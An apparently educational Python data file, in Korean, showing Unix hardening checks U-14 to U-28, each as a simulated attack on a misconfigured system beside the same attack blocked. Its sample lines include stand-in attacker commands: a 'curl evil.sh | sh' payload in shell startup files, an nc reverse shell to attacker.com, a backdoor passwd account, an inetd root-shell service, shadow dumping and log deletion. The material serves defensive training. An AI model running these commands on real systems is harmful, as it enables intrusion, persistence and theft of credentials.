
# ===== 파일 및 디렉터리 관리 (U-14~U-28) =====
DYN.update({
 'U-14': {
   'easy': '사장 책상 서랍이 <b>잠금 없이 복도에 놓인 것</b>(root 홈 755)과 같습니다. 게다가 안내 방송이 "지금 서 있는 곳부터 찾으세요"(PATH에 현재 폴더)라고 하죠. 공격자는 서랍의 메모(.bashrc)를 바꿔 사장이 셸을 열 때 원하는 명령을 실행시킵니다.',
   'attack_label': '공격자가 root 홈의 시작 파일을 변조해 명령을 가로챈다',
   'attack_vuln': [
     ['cmt', '# root 홈 디렉터리에 침입해 시작 파일 수정'],
     ['prompt', 'attacker$ ls -ld /root'],
     ['bad', 'drwxr-xr-x /root — 누구나 목록 조회 가능'],
     ['bad', 'attacker$ echo "curl evil.sh | sh" >> /root/.bashrc'],
     ['bad', '>> 다음 root 로그인 시 악성 명령 자동 실행'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — root 셸 장악', 'desc': '보호되지 않은 홈 디렉터리의 시작 파일이 변조되어 root 명령이 가로채입니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ echo "curl evil.sh | sh" >> /root/.bashrc'],
     ['good', '>> Permission denied — /root는 700(root만)'],
     ['good', '>> PATH에 현재 디렉터리(.)도 없어 위장 명령 무효'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 홈 보호·경로 정리', 'desc': 'root 홈 700과 PATH 정리로 시작 파일 변조·명령 위장이 모두 막힙니다.'},
 },
 'U-15': {
   'easy': '이삿짐 센터에 <b>명의를 알 수 없는 소포</b>가 쌓여 있는 상황입니다. 보낸 사람(소유 계정)이 삭제된 파일은 아무도 관리하지 않는 사각지대가 되어, 공격자가 자기 물건으로 위장해 두기 좋습니다.',
   'attack_label': '공격자가 소유자 없는 파일을 찾아 악성 도구로 활용한다',
   'attack_vuln': [
     ['cmt', '# 소유자 없는 파일 검색'],
     ['prompt', 'attacker$ find / -nouser -o -nogroup 2>/dev/null'],
     ['bad', '/var/spool/mail/ghost   (계정 삭제됨, 권한 777)'],
     ['bad', '/opt/legacy/bin/tool   (그룹 없음)'],
     ['bad', '>> 관리되지 않는 파일에 백도어 설치 — 발견 어려움'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 사각지대 악용', 'desc': '소유자 없는 파일은 점검 대상에서 빠져 공격자의 은신처로 쓰입니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 검색'],
     ['prompt', '# find / -nouser -o -nogroup 2>/dev/null'],
     ['good', '(출력 없음)'],
     ['good', '>> 모든 파일의 소유자·그룹이 확인됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '점검 통과 — 사각지대 없음', 'desc': '소유자 없는 파일이 없어 미관리 파일을 이용한 은신이 불가능합니다.'},
 },
 'U-16': {
   'easy': '회사 <b>전화번호부(계정 목록)를 아무나 지우고 고칠 수 있게</b> 게시해 둔 것입니다. 공격자는 몰래 "신입 사원 자리"를 하나 추가해 두고, 그 자리로 출근합니다.',
   'attack_label': '공격자가 passwd 파일을 직접 수정해 계정을 추가한다',
   'attack_vuln': [
     ['cmt', '# passwd 파일 권한 확인 후 수정 시도'],
     ['prompt', 'attacker$ ls -l /etc/passwd && echo "bkd:x:2000:2000::/tmp:/bin/bash" >> /etc/passwd'],
     ['bad', '-rw-rw-rw- 1 root root /etc/passwd'],
     ['bad', '>> 일반 사용자도 쓰기 가능 — 계정 추가 성공'],
     ['bad', '>> attacker$ su bkd — 상주 계정 확보'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 백도어 계정 추가', 'desc': '계정 목록 파일이 임의 수정 가능하여 공격자가 상주 계정을 심습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 수정 시도'],
     ['prompt', 'attacker$ echo "bkd:..." >> /etc/passwd'],
     ['good', '-rw-r--r-- 1 root root /etc/passwd'],
     ['good', '>> Permission denied — root만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 쓰기 보호', 'desc': '644(root 소유)로 잠겨 계정 추가가 불가능합니다.'},
 },
 'U-17': {
   'easy': '건물 <b>비상시 작동 절차서를 아무나 고칠 수 있게</b> 걸어 둔 것입니다. 다음 점검(재부팅) 때 절차서대로 "전체 문 열기"가 실행되죠. 부팅 스크립트는 재부팅 순간 root 권한으로 실행됩니다.',
   'attack_label': '공격자가 시작 스크립트에 악성 명령을 심어 재부팅 시 실행시킨다',
   'attack_vuln': [
     ['cmt', '# 시작 스크립트 권한 확인 후 변조'],
     ['prompt', 'attacker$ ls -l /etc/rc.d/init.d/network'],
     ['bad', '-rwxrwxrwx 1 root root ... network'],
     ['bad', 'attacker$ echo "nc attacker.com 4444 -e /bin/sh" >> /etc/rc.d/rc.local'],
     ['bad', '>> 관리자 재부팅 시 역방향 셸이 root 권한으로 실행'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 재부팅 시 역방향 셸', 'desc': '부팅 스크립트가 변조되어 재부팅하는 순간 공격자가 root 권한을 받습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ echo "nc ..." >> /etc/rc.d/rc.local'],
     ['good', '-rwxr-x--- 1 root root (750)'],
     ['good', '>> Permission denied — root만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 부팅 경로 보호', 'desc': '시작 스크립트가 root 소유 750으로 잠겨 변조가 막힙니다.'},
 },
 'U-18': {
   'easy': '<b>금고 비밀번호가 적힌 쪽지가 게시판에 붙어 있는 것</b>입니다. /etc/shadow가 644면 비밀번호 해시(쪽지)를 모든 사람이 읽을 수 있고, 공격자는 사진 찍어 두고 천천히 한 명씩 풀어봅니다.',
   'attack_label': '공격자가 shadow 파일을 읽어 전 계정 해시를 덤프한다',
   'attack_vuln': [
     ['cmt', '# shadow 권한 확인 후 덤프'],
     ['prompt', 'user01$ ls -l /etc/shadow && cat /etc/shadow'],
     ['bad', '-rw-r--r-- 1 root root /etc/shadow'],
     ['bad', 'root:$6$x4Tg...:...  (전 계정 해시 확보)'],
     ['bad', '>> GPU 대입: dba=Oracle123, app=P@ssw0rd ... 해독 진행'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 해시 덤프·해독', 'desc': '해시 파일이 일반 사용자에게 읽혀 전 계정의 비밀번호가 풀려 나갑니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 읽기 시도'],
     ['prompt', 'user01$ cat /etc/shadow'],
     ['good', '-r-------- 1 root root /etc/shadow'],
     ['good', '>> Permission denied — root만 읽기 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 해시 금고 보호', 'desc': '400 권한으로 root만 읽을 수 있어 해시 덤프가 원천 차단됩니다.'},
 },
 'U-19': {
   'easy': '회사 <b>내부 주소록을 아무나 고쳐서 택배가 공격자 집으로 배달되게</b> 하는 것입니다. /etc/hosts는 DNS보다 먼저 적용되므로, "은행 = 공격자 서버"로 바꿔치기하면 로그인 정보가 엉뚱한 곳으로 갑니다.',
   'attack_label': '공격자가 hosts 파일을 변조해 은행·관리 사이트를 가짜 서버로 보낸다',
   'attack_vuln': [
     ['cmt', '# hosts 권한 확인 후 매핑 변조'],
     ['prompt', 'attacker$ ls -l /etc/hosts && vi /etc/hosts'],
     ['bad', '-rw-rw-rw- 1 root root /etc/hosts'],
     ['bad', '10.99.9.9  bank.example.com  ← 가짜 서버 매핑 추가'],
     ['bad', '>> 사용자가 은행 사이트 접속 → 공격자 서버로 접속'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 로컬 피싱', 'desc': 'hosts가 임의 수정되어 신뢰 사이트 트래픽이 공격자 서버로 향합니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ vi /etc/hosts'],
     ['good', '-rw-r--r-- 1 root root /etc/hosts (644)'],
     ['good', '>> Permission denied — root만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 주소록 보호', 'desc': '644로 잠겨 도메인 매핑 변조가 불가능합니다.'},
 },
 'U-20': {
   'easy': '<b>청구 업무 규칙집을 아무나 수정</b>할 수 있게 둔 것입니다. inetd.conf는 어떤 서비스를 열지 정하는 규칙집이라, 공격자가 몰래 "야간 창구(악성 서비스)"를 등록해 두면 다음 재시작 때 열립니다.',
   'attack_label': '공격자가 inetd 설정에 악성 서비스를 등록한다',
   'attack_vuln': [
     ['cmt', '# inetd.conf 변조 시도'],
     ['prompt', 'attacker$ echo "backdoor stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf'],
     ['bad', '-rw-rw-rw- 1 root root /etc/inetd.conf'],
     ['bad', '>> 설정에 root 셸 서비스 등록 성공'],
     ['bad', '>> inetd 재시작 후 4444포트로 root 셸 접속 가능'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 서비스 등록', 'desc': '설정 파일이 임의 수정 가능하여 재시작 시 root 권한 서비스가 열립니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 등록 시도'],
     ['prompt', 'attacker$ echo "backdoor ..." >> /etc/inetd.conf'],
     ['good', '-rw-r----- 1 root root (640)'],
     ['good', '>> Permission denied — 등록 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 설정 보호', 'desc': '640 권한으로 서비스 등록 변조가 막힙니다.'},
 },
 'U-21': {
   'easy': '<b>CCTV가 어디에 저장되는지 정한 설정을 아무나 바꿔</b> 두는 것입니다. 공격자는 녹화 위치를 휴지통으로 바꿔 놓고 침입 흔적을 지웁니다. 로그 설정(rsyslog.conf)이 보호되어야 증거가 남습니다.',
   'attack_label': '공격자가 로그 설정을 끊어 침입 흔적을 지운다',
   'attack_vuln': [
     ['cmt', '# 로그 설정 변조 후 침입'],
     ['prompt', 'attacker$ sed -i "s/^*.info/#&/" /etc/rsyslog.conf'],
     ['bad', '-rw-rw-rw- 1 root root /etc/rsyslog.conf'],
     ['bad', '>> info 레벨 로깅 중단 — 이후 작업 기록 안 남음'],
     ['bad', '>> rm /var/log/secure — 흔적 삭제 후 로그아웃'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 증거 인멸', 'desc': '로그 설정이 변조되어 침입 사실 자체가 기록되지 않습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ vi /etc/rsyslog.conf'],
     ['good', '-rw-r----- 1 root root (640)'],
     ['good', '>> Permission denied — 설정 변경 불가'],
     ['good', '>> 모든 작업이 원격 로그 서버에도 실시간 전송됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 로그 보존', 'desc': '설정 보호와 원격 로그 이중화로 흔적 삭제가 불가능합니다.'},
 },
 'U-22': {
   'easy': '<b>내선번호 안내판을 아무나 바꿔</b> 경리팀 전화를 공격자 책상으로 돌리는 것입니다. /etc/services는 포트-서비스 매핑 안내판이라, 변조되면 보안 장비 판단과 서비스 동작이 흐트러집니다.',
   'attack_label': '공격자가 포트 매핑을 변조해 통신을 가로챈다',
   'attack_vuln': [
     ['cmt', '# services 파일 변조'],
     ['prompt', 'attacker$ echo "www 8443/tcp  # redirected" >> /etc/services'],
     ['bad', '-rw-rw-rw- 1 root root /etc/services'],
     ['bad', '>> 서비스-포트 매핑이 바뀌어 방화벽 정책 우회'],
     ['bad', '>> 일부 프로그램이 공격자 포트로 통신'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 포트 위장', 'desc': '매핑 변조로 서비스가 의도치 않은 포트를 타고 방화벽을 우회합니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ vi /etc/services'],
     ['good', '-rw-r--r-- 1 root root (644)'],
     ['good', '>> Permission denied — root만 수정'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 매핑 보호', 'desc': '644로 잠겨 포트 매핑 변조가 불가능합니다.'},
 },
 'U-23': {
   'easy': '사무실 곳골마다 <b>"이 문은 누가 쓰든 사장 권한으로 열리는" 만능키</b>가 걸려 있는 상황입니다. SUID가 붙은 파일은 실행한 사람 누구에게나 소유자(root) 권한을 줍니다. 하나하나 꼭 필요한지만 남겨야 합니다.',
   'attack_label': '공격자가 방치된 SUID 파일을 이용해 root 권한을 얻는다',
   'attack_vuln': [
     ['cmt', '# SUID 파일 목록 확인'],
     ['prompt', 'attacker$ find / -perm -4000 -type f 2>/dev/null'],
     ['bad', '/usr/bin/old-backup  (root SUID — 사용 중단 도구)'],
     ['bad', '/tmp/collector      (root SUID — 권한 버그 있음)'],
     ['bad', '>> old-backup의 경로 조작 버그로 root 셸 획득'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 권한 상승 사다리', 'desc': '불필요한 SUID 파일이 권한 상승의 발판으로 쓰입니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 검색 — 승인 목록과 비교'],
     ['prompt', '# find / -perm -4000 -type f | diff approved.txt -'],
     ['good', '(차이 없음 — 승인된 SUID만 존재)'],
     ['good', '>> 새 SUID 생성 시 즉시 알림 발생'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '점검 통과 — 만능키 최소화', 'desc': 'SUID가 승인 목록으로 관리되어 권한 상승 경로가 최소화됩니다.'},
 },
 'U-24': {
   'easy': '각자 사물함의 <b>업무 매뉴얼을 다른 사람이 몰래 고쳐 두는 것</b>입니다. .bash_profile은 로그인할 때마다 읽는 매뉴얼이라, 공격자가 한 줄 심어 두면 그 사람은 매일 출근(로그인)할 때마다 공격자 명령을 실행합니다.',
   'attack_label': '공격자가 환경변수 파일에 명령을 심어 로그인 때마다 실행시킨다',
   'attack_vuln': [
     ['cmt', "# 다른 사용자의 시작 파일 변조"],
     ['prompt', 'attacker$ echo "curl evil.sh | sh" >> ~user01/.bash_profile'],
     ['bad', '-rw-rw-rw- 1 user01 user01 .bash_profile'],
     ['bad', '>> 변조 성공 — user01 로그인 시 악성 명령 실행'],
     ['bad', '>> alias ls="curl evil.sh | sh; ls" 위장도 가능'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 로그인 시 감염', 'desc': '시작 파일이 임의 수정되어 피해자가 로그인할 때마다 공격 명령이 돕니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ echo "..." >> ~user01/.bash_profile'],
     ['good', '-rw------- 1 user01 user01 (600)'],
     ['good', '>> Permission denied — 본인만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 사물함 잠금', 'desc': '소유자 전용 권한으로 시작 파일 변조가 막힙니다.'},
 },
 'U-25': {
   'easy': '사무실 곳곳에 <b>누구나 마음대로 쓸 수 있는 공용 칠판</b>이 널려 있는 상황입니다. 내용을 몰래 바꿔치기하기 딱 좋죠. world writable 파일은 공격자가 악성 스크립트로 교체하는 즉시 다음 실행자가 감염됩니다.',
   'attack_label': '공격자가 공용 스크립트를 악성 버전으로 바꿔치기한다',
   'attack_vuln': [
     ['cmt', '# 쓰기 가능 파일 확인 후 교체'],
     ['prompt', 'attacker$ ls -l /usr/local/bin/report.sh'],
     ['bad', '-rwxrwxrwx 1 root root report.sh (777)'],
     ['bad', 'attacker$ cp evil.sh /usr/local/bin/report.sh'],
     ['bad', '>> 다음 정각 실행 때 root 권한으로 악성 코드 동작'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 바꿔치기 감염', 'desc': '무단 기입 가능 파일이 악성 버전으로 교체되어 실행자들이 감염됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 교체 시도'],
     ['prompt', 'attacker$ cp evil.sh /usr/local/bin/report.sh'],
     ['good', '-rwxr-xr-x 1 root root report.sh (755)'],
     ['good', '>> Permission denied — root만 수정'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 칠판 제거', 'desc': 'world writable이 제거되어 바꿔치기가 불가능합니다.'},
 },
 'U-26': {
   'easy': '경비실의 <b>모든 장비를 아르바이트생 명의로 등록해 둔 것</b>입니다. /dev의 디스크·메모리 장치는 건물 원본 설계도가 든 금고입니다. 아무나 열 수 있으면 건물 통째로 복사해 갑니다.',
   'attack_label': '공격자가 디스크 디바이스를 직접 읽어 데이터를 통째로 훔친다',
   'attack_vuln': [
     ['cmt', '# 디스크 디바이스 권한 확인'],
     ['prompt', 'user01$ ls -l /dev/sda && dd if=/dev/sda of=/tmp/disk.img'],
     ['bad', 'brw-rw-rw- 1 root disk /dev/sda'],
     ['bad', '>> 디스크 전체 이미지 복사 성공'],
     ['bad', '>> 이미지에서 해시·문서·비밀번호 원본 확보'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 디스크 통째 유출', 'desc': '디바이스가 전원 읽기 가능하여 저장된 모든 데이터가 복사됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 복사 시도'],
     ['prompt', 'user01$ dd if=/dev/sda of=/tmp/disk.img'],
     ['good', 'brw-rw---- 1 root disk /dev/sda (660)'],
     ['good', '>> Permission denied — root·disk 그룹만 접근'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 장비 잠금', 'desc': 'root 소유 660으로 디바이스 직접 읽기가 차단됩니다.'},
 },
 'U-27': {
   'easy': '현관에 <b>"아는 사람은 그냥 들어오세요"라는 쪽지</b>를 붙여 둔 것입니다. .rhosts의 "+ +"는 정확히 그 쪽지입니다. 한 대가 뚫리면 그 서버에 적어 둔 모든 서버가 인증 없이 연달아 열립니다.',
   'attack_label': '공격자가 .rhosts 신뢰 목록을 이용해 인증 없이 침입한다',
   'attack_vuln': [
     ['cmt', '# .rhosts 확인 후 rlogin 시도'],
     ['prompt', 'attacker$ rlogin -l root victim.com'],
     ['bad', 'root@victim: cat /root/.rhosts → "+ +"'],
     ['bad', '>> Password: 없이 바로 root 셸 진입'],
     ['bad', '>> 신뢰 목록에 적힌 다른 서버로도 연쇄 침입'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무인증 연쇄 침입', 'desc': 'rhosts 신뢰로 비밀번호 없이 서버들이 연달아 넘어갑니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 rlogin 시도'],
     ['prompt', 'attacker$ rlogin -l root victim.com'],
     ['good', 'connect: Connection refused'],
     ['good', '>> r 서비스 비활성화 + .rhosts 없음'],
     ['warn', '>> SSH 키 기반 인증만 허용됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 신뢰 쪽지 제거', 'desc': '.rhosts 제거와 r 서비스 비활성화로 무인증 경로가 사라집니다.'},
 },
 'U-28': {
   'easy': '안내데스크가 <b>"찾아오는 사람 전원에게 회사 카드를 발급"</b>해 주는 상황입니다. hosts.allow/deny가 비어 있으면 서비스 포트에 누구나 접근을 시도할 수 있죠. 관리망 직원 카드만 발급받도록 명단을 만들어야 합니다.',
   'attack_label': '공격자가 인터넷의 임의 IP에서 관리 서비스를 두드린다',
   'attack_vuln': [
     ['cmt', '# 임의 IP에서 SSH·서비스 포트 접근'],
     ['prompt', 'attacker$ nmap -p 22,23,1521 victim.com'],
     ['bad', '22/tcp  open  ssh   ← 어디서든 접근 허용'],
     ['bad', '23/tcp  open  telnet'],
     ['bad', '>> 출입구 제한 없음 — 대입·취약점 공격 시도 가능'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무차별 접근', 'desc': '접근 제한이 없어 인터넷 어디서든 서비스를 두드릴 수 있습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 스캔'],
     ['prompt', 'attacker$ nmap -p 22,23,1521 victim.com'],
     ['good', 'hosts.allow: sshd: 10.0.10. (관리망만)'],
     ['good', 'hosts.deny: ALL: ALL (기본 거부)'],
     ['warn', '>> 관리망 외 접속은 즉시 거부'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 명단 발급제', 'desc': '허용 IP 명단과 기본 거부 정책으로 관리 서비스가 관리망에만 열립니다.'},
 },
})
